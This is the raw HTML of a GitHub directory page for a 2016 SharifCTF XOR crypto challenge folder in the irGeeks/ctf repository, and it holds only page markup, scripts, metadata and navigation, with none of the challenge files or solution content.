defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script> <title>ctf/2016-SharifCTF7/Crypto/XOR at master · irGeeks/ctf · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)"> <meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6"> <meta name="request-id" content="C363:380B:4505378:4697996:641228C4" data-pjax-transient="true"/><meta name="html-safe-nonce" content="6360c93665feee6eb9c78df772495a6d6a0679d842f4b0fa2caba5f7baa47da2" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMzYzOjM4MEI6NDUwNTM3ODo0Njk3OTk2OjY0MTIyOEM0IiwidmlzaXRvcl9pZCI6Ijg0NTAyMzEyMTk3MDk2NDY3NiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="e0f29d43aa6793b2ffc5e69dc5c2cdf6004890f73c0d89d66feb385646dd0cc9" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:76858104" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" /> <meta name="selected-link" value="repo_source" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to irGeeks/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/aed1fa4a06831227ed41dfcb4107da9e0419f85f06125ff09c2e3e86cb54ae98/irGeeks/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2016-SharifCTF7/Crypto/XOR at master · irGeeks/ctf" /><meta name="twitter:description" content="Contribute to irGeeks/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/aed1fa4a06831227ed41dfcb4107da9e0419f85f06125ff09c2e3e86cb54ae98/irGeeks/ctf" /><meta property="og:image:alt" content="Contribute to irGeeks/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2016-SharifCTF7/Crypto/XOR at master · irGeeks/ctf" /><meta property="og:url" content="https://github.com/irGeeks/ctf" /><meta property="og:description" content="Contribute to irGeeks/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta data-hydrostats="publish"> <meta name="go-import" content="github.com/irGeeks/ctf git https://github.com/irGeeks/ctf.git"> <meta name="octolytics-dimension-user_id" content="24648078" /><meta name="octolytics-dimension-user_login" content="irGeeks" /><meta name="octolytics-dimension-repository_id" content="76858104" /><meta name="octolytics-dimension-repository_nwo" content="irGeeks/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="76858104" /><meta name="octolytics-dimension-repository_network_root_nwo" content="irGeeks/ctf" /> <link rel="canonical" href="https://github.com/irGeeks/ctf/tree/master/2016-SharifCTF7/Crypto/XOR" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="76858104" data-scoped-search-url="/irGeeks/ctf/search" data-owner-scoped-search-url="/users/irGeeks/search" data-unscoped-search-url="/search" data-turbo="false" action="/irGeeks/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" 